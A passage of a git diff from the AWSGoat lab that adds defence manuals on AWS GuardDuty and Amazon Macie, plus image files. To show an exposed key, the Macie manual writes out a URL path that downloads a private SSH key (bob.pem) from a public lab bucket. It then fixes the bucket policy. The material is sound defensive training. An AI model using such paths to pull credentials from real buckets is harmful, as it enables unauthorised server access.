listed S3 bucket has been publicly exposed to all the authenticated AWS users because an IAM entity has changed a bucket policy on that S3 bucket. + +To take the necessary action on the resource (S3 bucket), click on the "Resource ID" and it will navigate you to the resource. + +![](./images/Amazon-Guardduty/8.png) + +Here we want to check the bucket permissions so, click on the "Permissions" tab. + +![](./images/Amazon-Guardduty/9.png) + +Here, "s3:ListBucket" permission is the unintended access to this S3 Bucket and this may lead to the sensitive data exposure. The "s3:ListBucket" permission returns a list of all buckets owned by the authenticated sender of the request and we don't want our user to have this permission. Whereas, "s3:GetObject" permission is simply used to retrieves objects from Amazon S3 bucket. And we need "s3:GetObject" permission to run our web application. + +To edit the bucket permissions, click on the "Edit" button. + +![](./images/Amazon-Guardduty/10.png) + +Here remove the "s3:ListBucket" permission using editor and click on the "Save changes" button. + +![](./images/Amazon-Guardduty/11.png) + +You can see the Bucket policy got changed. + +![](./images/Amazon-Guardduty/12.png) + +Now, navigate back to the GuardDuty dashboard and click on the another finding available. + +You will notice that this finding is identical to the one discussed above, just the bucket name is different. + +![](./images/Amazon-Guardduty/13.png) + +![](./images/Amazon-Guardduty/14.png) + +To check the bucket policy click on the "Resource Id" and it will navigate you to the resource. + +![](./images/Amazon-Guardduty/15.png) + +Here, click on the "Permissions" tab. + +![](./images/Amazon-Guardduty/16.png) + +The bucket policy looks exactly what we wanted. So, we will not take any action or change anything here. + +![](./images/Amazon-Guardduty/17.png) + +Thus, GuardDuty generates the findings whenever it detects unexpected and potentially malicious activity in your AWS environment and allows us to take the necessary actions. + +# Inferences + +* GuardDuty is a threat detection service that continuously monitors your AWS Service accounts, workloads, and data stored in Amazon S3 for malicious activity. + +* When GuardDuty detects unexpected and potentially malicious activity in your AWS environment, it generates a finding. + +* Using the findings we can take the necessary actions. + +* This can defend us against the attack performed in [IAM Privilege Escalation](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md) when the attacker tries to list the bucket objects. + +# Further Readings + +* [What is AWS GuardDuty](https://docs.aws.amazon.com/guardduty/latest/ug/what-is-guardduty.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/Amazon Macie.md b/defence-manuals/Amazon Macie.md new file mode 100644 index 00000000..fb5e5b4b --- /dev/null +++ b/defence-manuals/Amazon Macie.md @@ -0,0 +1,147 @@ +# Objective + +Find vulnerable objects in AWS S3 bucket using Amazon Macie. + +# Solution + +* Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat Module:1](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed + +* Now, search for **Amazon Macie** and head to it's page. + + ![](./images/Amazon-Macie/1.png) + + ![](./images/Amazon-Macie/2.png) + +* Click on **Get Started** and in the next page click on **Enable Macie**. + + ![](./images/Amazon-Macie/4.png) + + +## Finding Vulnerable objects in public S3 Bucket + + +* Now, in the **Get Started** section, click on **Create job** under **Analyze public buckets** + + ![](./images/Amazon-Macie/5.png) + +* Select the following buckets which are public and click on **Next**. + + ![](./images/Amazon-Macie/6.png) + +* In **Refine the scope** step, select **One-time job** for **Sensitive data discovery options** and click on **Next**. + + ![](./images/Amazon-Macie/7.png) + +* In **Select managed data identifiers**, choose **Include** option and select all the data types with **CREDENTIALS** as **Sensitive data catagory** and click on next. + + ![](./images/Amazon-Macie/8.png) + +* Click on **Next** in all the other screens and click on **Submit**. + + ![](./images/Amazon-Macie/10.png) + +* Now, wait for 7 to 12 minutes while Macie scans for vulnerable objects. + +* After the run has completed, click on **Show Results** to find out which object is vulnerable. + + ![](./images/Amazon-Macie/12.png) + +* Now, we can see that **.pem** files have public read access which is unneccesary and might give access to one of our ec2 instances. + + ![](./images/Amazon-Macie/14.png) + +## Fixing misconfigured permissions + +* Go to the application's home page, and click on **View page source** from the *right-click* menu. + + ![](./images/Amazon-Macie/15.png) + +* Now, click on the link displayed on page. + + ![](./images/Amazon-Macie/16.png) + +* if we observe carefully, the vulnerable objects are present in dev bucket. Hence, replace **production** with **dev** and add the payload after url. Let's check if we can access the .pem file. + + ![](./images/Amazon-Macie/17.png) + + ![](./images/Amazon-Macie/18.png) + +* Your address would be similar to this: + ```html + https://dev-[bucket-url]/shared/files/.ssh/keys/bob.pem + ``` + +* We can see that the **bob.pem** file has been downloaded. Which means anyone on the internet can access it and can get access to ec2 instance. + +* Now, let's remove the public read access in the permissions tab of this file. + + ![](./images/Amazon-Macie/19.png) + +* Click on **Edit** and remove the **Public Read Access** permission. let's check if we can still download the file. + + ![](./images/Amazon-Macie/20.png) + +* We can still download the file even after removing **Public Read access**, this might be due to misconfigured bucket permissions. Let's fix them. + +* Now, head to **bucket permissions**. We can see that the bucket has excessive permissions. + + ![](./images/Amazon-Macie/21.png) + +* S3 bucket should only be accessible by the resources which need it. Now, go to IAM roles and search for **AWS_GOAT_ROLE**. Copy the role's *ARN*. + + ![](./images/Amazon-Macie/22.png) + + ![](./images/Amazon-Macie/23.png) + +* Go back to S3 bucket's permissions tab. and add the copied ARN to the **principal** and also remove **ListBucket** permission. Your policy statement should look like this: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[ACCOUNT-ID]:role/AWS_GOAT_ROLE" + }, + "Action": "s3:GetObject", + "Resource": [ + "arn:aws:s3:::dev-blog-awsgoat-bucket-[ACCOUNT-ID]/*", + "arn:aws:s3:::dev-blog-awsgoat-bucket-[ACCOUNT-ID]" + ] + } + ] + } + ``` + + ![](./images/Amazon-Macie/24.png) + +* Now, let's try to download the pem file. We can see that the access is denied! + + ![](./images/Amazon-Macie/25.png) + +* Don't forget to remove **Public Read Access** to all the other vulnerable files. + +* Voila, we can now say that we have succesfully secured our s3 bucket as well as the infrastructure. + +# Inferences + +* Amazon Macie helps identify vulnerable objects such as Credentials, Sensitive information etc., in our s3 buckets. + +* Even though our bucket has correct permissions, we need to make sure that the objects in the bucket do not have **Public Read Access**. + +* We can run **Amazon Macie** jobs weekly/monthly to detect vulnerable objects which are exploitable. This is suited for those whose infrastructure changes constantly. + +* This can defend us against the attack performed in [IAM Privilege Escalation Manual](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md). where the hacker tries to download the .pem file and gets into EC2 Instance. + + +# Further Readings + +* [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html) + +* [Top 10 security best practices for securing data in Amazon S3](https://aws.amazon.com/blogs/security/top-10-security-best-practices-for-securing-data-in-amazon-s3) + +* [What is AWS Config?](https://docs.aws.amazon.com/config/latest/developerguide/WhatIsConfig.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/images/AWS-Config/1.png b/defence-manuals/images/AWS-Config/1.png new file mode 100644 index 00000000..6e970955 Binary files /dev/null and b/defence-manuals/images/AWS-Config/1.png differ diff --git a/defence-manuals/images/AWS-Config/10.png b/defence-manuals/images/AWS-Config/10.png new file mode 100644 index 00000000..bf42ea37 Binary files /dev/null and b/defence-manuals/images/AWS-Config/10.png differ diff --git a/defence-manuals/images/AWS-Config/11.png b/defence-manuals/images/AWS-Config/11.png new file mode 100644 index 00000000..992df75d Binary files /dev/null and b/defence-manuals/images/AWS-Config/11.png differ diff --git a/defence-manuals/images/AWS-Config/12.png b/defence-manuals/images/AWS-Config/12.png new file mode 100644 index 00000000..898fffdb Binary files /dev/null and b/defence-manuals/images/AWS-Config/12.png differ diff --git a/defence-manuals/images/AWS-Config/13.png b/defence-manuals/images/AWS-Config/13.png new file mode 100644 index 00000000..2c39e8ba Binary files /dev/null and b/defence-manuals/images/AWS-Config/13.png differ diff --git a/defence-manuals/images/AWS-Config/14.png b/defence-manuals/images/AWS-Config/14.png new file mode 100644 index 00000000..05b31dd2 Binary files /dev/null and b/defence-manuals/images/AWS-Config/14.png differ diff --git a/defence-manuals/images/AWS-Config/15.png b/defence-manuals/images/AWS-Config/15.png new file mode 100644 index 00000000..be77ee89 Binary files /dev/null and b/defence-manuals/images/AWS-Config/15.png differ diff --git a/defence-manuals/images/AWS-Config/16.png b/defence-manuals/images/AWS-Config/16.png new file mode 100644 index 00000000..88b0e50c Binary files /dev/null and b/defence-manuals/images/AWS-Config/16.png differ diff --git a/defence-manuals/images/AWS-Config/17.png b/defence-manuals/images/AWS-Config/17.png new file mode 100644 index 00000000..15ebaa37 Binary files /dev/null and b/defence-manuals/images/AWS-Config/17.png differ diff --git a/defence-manuals/images/AWS-Config/2.png b/defence-manuals/images/AWS-Config/2.png new file mode 100644 index 00000000..543c8f64 Binary files /dev/null and b/defence-manuals/images/AWS-Config/2.png differ diff --git a/defence-manuals/images/AWS-Config/3.png b/defence-manuals/images/AWS-Config/3.png new file mode 100644 index 00000000..790b6fc8 Binary files /dev/null and b/defence-manuals/images/AWS-Config/3.png differ diff --git a/defence-manuals/images/AWS-Config/4.png b/defence-manuals/images/AWS-Config/4.png new file mode 100644 index 00000000..fb126999 Binary files /dev/null and b/defence-manuals/images/AWS-Config/4.png differ diff --git a/defence-manuals/images/AWS-Config/5.png b/defence-manuals/images/AWS-Config/5.png new file mode 100644 index 00000000..19bedfbf Binary files /dev/null and b/defence-manuals/images/AWS-Config/5.png differ diff --git a/defence-manuals/images/AWS-Config/6.png b/defence-manuals/images/AWS-Config/6.png new file mode 100644 index 00000000..a94d1c0a Binary files /dev/null and b/defence-manuals/images/AWS-Config/6.png differ diff --git a/defence-manuals/images/AWS-Config/7.png b/defence-manuals/images/AWS-Config/7.png new file mode 100644 index 00000000..af0c02cc Binary files /dev/null and b/defence-manuals/images/AWS-Config/7.png differ diff --git a/defence-manuals/images/AWS-Config/8.png b/defence-manuals/images/AWS-Config/8.png new file mode 100644 index 00000000..5418d92f Binary files /dev/null and b/defence-manuals/images/AWS-Config/8.png differ diff --git a/defence-manuals/images/AWS-Config/9.png b/defence-manuals/images/AWS-Config/9.png new file mode 100644 index 00000000..7a33c609 Binary files /dev/null and b/defence-manuals/images/AWS-Config/9.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png new file mode 100644 index 00000000..4295fb7d Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png new file mode 100644 index 00000000..87fb4198 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png new file mode 100644 index 00000000..07d53ca1 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png new file mode 100644 index 00000000..21ea1825 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png new file mode 100644 index 00000000..22fbaff3 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png new file mode 100644 index 00000000..969dd736 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png new file mode 100644 index 00000000..70dba393 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png new file mode 100644 index 00000000..a5ba0ad2 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png new file mode 100644 index 00000000..1337ee67 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png new file mode 100644 index 00000000..65f10dd7 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png new file mode 100644 index 00000000..32562a4b Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png new file mode 100644 index 00000000..c903ae11 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png new file mode 100644 index 00000000..f4225690 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png new file mode 100644 index 00000000..107d2e3e Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png new file mode 100644 index 00000000..14294a41 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png new file mode 100644 index 00000000..41ac546b Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png new file mode 100644 index 00000000..cb4b8839 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png new file mode 100644 index 00000000..a1140283 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/1.png b/defence-manuals/images/Amazon-Guardduty/1.png new file mode 100644 index 00000000..7002dddb Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/1.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/10.png b/defence-manuals/images/Amazon-Guardduty/10.png new file mode 100644 index 00000000..c2675d29 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/10.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/11.png b/defence-manuals/images/Amazon-Guardduty/11.png new file mode 100644 index 00000000..7a0d4cd3 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/11.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/12.png b/defence-manuals/images/Amazon-Guardduty/12.png new file mode 100644 index 00000000..0c71c9b7 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/12.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/13.png b/defence-manuals/images/Amazon-Guardduty/13.png new file mode 100644 index 00000000..5c905daa Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/13.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/14.png b/defence-manuals/images/Amazon-Guardduty/14.png new file mode 100644 index 00000000..385ec25c Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/14.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/15.png b/defence-manuals/images/Amazon-Guardduty/15.png new file mode 100644 index 00000000..ccba1eb8 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/15.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/16.png b/defence-manuals/images/Amazon-Guardduty/16.png new file mode 100644 index 00000000..c9744771 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/16.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/17.png b/defence-manuals/images/Amazon-Guardduty/17.png new file mode 100644 index 00000000..dbd2119c Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/17.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/2.png b/defence-manuals/images/Amazon-Guardduty/2.png new file mode 100644 index 00000000..b08defa8 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/2.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/3.png b/defence-manuals/images/Amazon-Guardduty/3.png new file mode 100644 index 00000000..1a7ef801 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/3.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/4.png b/defence-manuals/images/Amazon-Guardduty/4.png new file mode 100644 index 00000000..a9910a38 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/4.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/5.png b/defence-manuals/images/Amazon-Guardduty/5.png new file mode 100644 index 00000000..6a912002 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/5.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/6.PNG b/defence-manuals/images/Amazon-Guardduty/6.PNG new file mode 100644 index 00000000..e1d00fb7 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/6.PNG differ diff --git a/defence-manuals/images/Amazon-Guardduty/7.png b/defence-manuals/images/Amazon-Guardduty/7.png new file mode 100644 index 00000000..6526f497 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/7.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/8.png b/defence-manuals/images/Amazon-Guardduty/8.png new file mode 100644 index 00000000..ffaf5319 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/8.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/9.png b/defence-manuals/images/Amazon-Guardduty/9.png new file mode 100644 index 00000000..1fbf2f7f Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/9.png differ diff --git a/defence-manuals/images/Amazon-Macie/1.png b/defence-manuals/images/Amazon-Macie/1.png new file mode 100644 index 00000000..2cec820d Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/1.png differ diff --git a/defence-manuals/images/Amazon-Macie/10.png b/defence-manuals/images/Amazon-Macie/10.png new file mode 100644 index 00000000..0be30966 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/10.png differ diff --git a/defence-manuals/images/Amazon-Macie/11.png b/defence-manuals/images/Amazon-Macie/11.png new file mode 100644 index 00000000..2ed4ec56 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/11.png differ diff --git a/defence-manuals/images/Amazon-Macie/12.png b/defence-manuals/images/Amazon-Macie/12.png new file mode 100644 index 00000000..3900344c Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/12.png differ diff --git a/defence-manuals/images/Amazon-Macie/13.png b/defence-manuals/images/Amazon-Macie/13.png new file mode 100644 index 00000000..d004fef4 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/13.png differ diff --git a/defence-manuals/images/Amazon-Macie/14.png b/defence-manuals/images/Amazon-Macie/14.png new file mode 100644 index 00000000..7c9898cf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/14.png differ diff --git a/defence-manuals/images/Amazon-Macie/15.png b/defence-manuals/images/Amazon-Macie/15.png new file mode 100644 index 00000000..4553be7b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/15.png differ diff --git a/defence-manuals/images/Amazon-Macie/16.png b/defence-manuals/images/Amazon-Macie/16.png new file mode 100644 index 00000000..e490d7fd Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/16.png differ diff --git a/defence-manuals/images/Amazon-Macie/17.png b/defence-manuals/images/Amazon-Macie/17.png new file mode 100644 index 00000000..4218e874 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/17.png differ diff --git a/defence-manuals/images/Amazon-Macie/18.png b/defence-manuals/images/Amazon-Macie/18.png new file mode 100644 index 00000000..727af4e4 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/18.png differ diff --git a/defence-manuals/images/Amazon-Macie/19.png b/defence-manuals/images/Amazon-Macie/19.png new file mode 100644 index 00000000..5871319c Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/19.png differ diff --git a/defence-manuals/images/Amazon-Macie/2.png b/defence-manuals/images/Amazon-Macie/2.png new file mode 100644 index 00000000..ab1ffe7b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/2.png differ diff --git a/defence-manuals/images/Amazon-Macie/20.png b/defence-manuals/images/Amazon-Macie/20.png new file mode 100644 index 00000000..1b8b2dd8 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/20.png differ diff --git a/defence-manuals/images/Amazon-Macie/21.png b/defence-manuals/images/Amazon-Macie/21.png new file mode 100644 index 00000000..d518c579 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/21.png differ diff --git a/defence-manuals/images/Amazon-Macie/22.png b/defence-manuals/images/Amazon-Macie/22.png new file mode 100644 index 00000000..e7c4ff70 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/22.png differ diff --git a/defence-manuals/images/Amazon-Macie/23.png b/defence-manuals/images/Amazon-Macie/23.png new file mode 100644 index 00000000..807bd3bf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/23.png differ diff --git a/defence-manuals/images/Amazon-Macie/24.png b/defence-manuals/images/Amazon-Macie/24.png new file mode 100644 index 00000000..ce79833e Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/24.png differ diff --git a/defence-manuals/images/Amazon-Macie/25.png b/defence-manuals/images/Amazon-Macie/25.png new file mode 100644 index 00000000..ed3445e0 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/25.png differ diff --git a/defence-manuals/images/Amazon-Macie/3.png b/defence-manuals/images/Amazon-Macie/3.png new file mode 100644 index 00000000..325af484 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/3.png differ diff --git a/defence-manuals/images/Amazon-Macie/4.png b/defence-manuals/images/Amazon-Macie/4.png new file mode 100644 index 00000000..6c37623d Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/4.png differ diff --git a/defence-manuals/images/Amazon-Macie/5.png b/defence-manuals/images/Amazon-Macie/5.png new file mode 100644 index 00000000..31a92bab Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/5.png differ diff --git a/defence-manuals/images/Amazon-Macie/6.png b/defence-manuals/images/Amazon-Macie/6.png new file mode 100644 index 00000000..c805c57b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/6.png differ diff --git a/defence-manuals/images/Amazon-Macie/7.png b/defence-manuals/images/Amazon-Macie/7.png new file mode 100644 index 00000000..1d25e343 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/7.png differ diff --git a/defence-manuals/images/Amazon-Macie/8.png b/defence-manuals/images/Amazon-Macie/8.png new file mode 100644 index 00000000..acd9df47 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/8.png differ diff --git a/defence-manuals/images/Amazon-Macie/9.png b/defence-manuals/images/Amazon-Macie/9.png new file mode 100644 index 00000000..30b855cf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/9.png differ diff --git a/modules/module-2/src/src/images/.DS_Store b/modules/module-2/src/src/images/.DS_Store deleted file mode 100644 index 50c49d7c..00000000 Binary files a/modules/module-2/src/src/images/.DS_Store and /dev/null differ